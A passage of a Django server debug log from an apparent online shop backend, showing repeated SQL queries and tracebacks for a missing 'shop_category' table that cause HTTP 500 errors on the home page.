line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:00:46] "GET / HTTP/1.0" 500 197392 DEBUG 2019-11-28 14:00:47,536 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:00:47,571 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:00:47,572 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,573 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,574 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,576 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,577 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,578 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,580 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,581 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,586 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,587 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,589 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,590 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,592 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,593 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,595 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,596 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,597 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,598 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,599 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:00:47,600 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:00:47] "GET / HTTP/1.0" 500 197392 Not Found: /favicon.ico [28/Nov/2019 14:00:48] "GET /favicon.ico HTTP/1.0" 404 3802 Not Found: /favicon.ico [28/Nov/2019 14:00:49] "GET /favicon.ico HTTP/1.0" 404 3802 DEBUG 2019-11-28 14:01:00,391 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:01:00,498 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:01:00,500 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,503 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,505 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,508 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,510 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,512 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,514 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,516 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,518 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,519 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,521 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,523 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,524 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,526 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,528 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,530 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,531 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,532 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,533 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:00,535 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 14:01:00] "GET / HTTP/1.0" 500 197402 Not Found: /favicon.ico [28/Nov/2019 14:01:02] "GET /favicon.ico HTTP/1.0" 404 3802 DEBUG 2019-11-28 14:01:30,533 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 14:01:30,570 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 14:01:30,571 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,573 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,575 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,576 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,578 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,579 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,581 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,583 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,585 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,586 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,588 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,590 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,592 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,593 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,595 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,596 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,598 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,599 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,601 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 14:01:30,602 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, 